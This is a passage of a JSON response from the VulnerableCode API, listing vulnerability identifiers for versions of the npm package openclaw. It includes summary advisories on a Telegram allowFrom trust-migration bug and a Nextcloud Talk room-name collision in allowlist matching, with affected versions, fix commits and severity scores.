f"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-
guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-
qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-
2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-
kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-
tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.13"}],"aliases":["GHSA-63f5-hhc7-cx6p"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3qbe-dsde-p7dz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90102?format=json","vulnerability_id":"VCID-3wsw-d4z2-dydt","summary":"OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts\n## Summary\nTelegram legacy allowFrom migration fans default-account trust into all named accounts\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: 
`<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/d8c68c8d4265ea6fa5e8c5e056534c351bddef37"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:
N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f693-58pc-2gfr"},{"reference_url":"https://github.com/advisories/GHSA-f693-58pc-2gfr","reference_id":"GHSA-f693-58pc-2gfr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f693-58pc-2gfr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VC
ID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VC
ID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-f693-58pc-2gfr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3wsw-d4z2-dydt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91662?format=json","vulnerability_id":"VCID-3xeb-phgc-vkcg","summary":"OpenClaw: Nextcloud Talk room allowlist matched colliding room names instead of stable room tokens\n## Summary\nNextcloud Talk room authorization matched on collidable room names instead of the stable room token, allowing policy confusion across similarly named rooms.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/nextcloud-talk/src/inbound.ts now resolves allowlist policy from roomToken-backed room identity.\n- extensions/nextcloud-talk/src/policy.ts now keys room authorization on stable room tokens instead of display names.\n\nOpenClaw thanks @zpbrent for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35624","reference_id":"","reference_type":"","scores":[{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21321","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21369","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00069","scoring_system":"epss","scoring_elements":"0.21384","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35624"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elemen
ts":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/a47722de7e3c9cbda8d5512747ca7e3bb8f6ee66"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xhq5-45pm-2gjr"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35624","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35624"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","sco
ring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:15:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-policy-confusion-via-room-name-collision-in-nextcloud-talk"},{"reference_url":"https://github.com/advisories/GHSA-xhq5-45pm-2gjr","reference_id":"GHSA-xhq5-45pm-2gjr","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xhq5-45pm-2gjr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-